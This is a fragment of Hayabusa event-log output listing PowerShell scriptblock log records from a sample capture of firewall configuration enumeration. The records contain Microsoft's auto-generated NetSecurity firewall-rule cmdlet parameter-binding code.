[Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value =",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_m,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.661 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ethodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 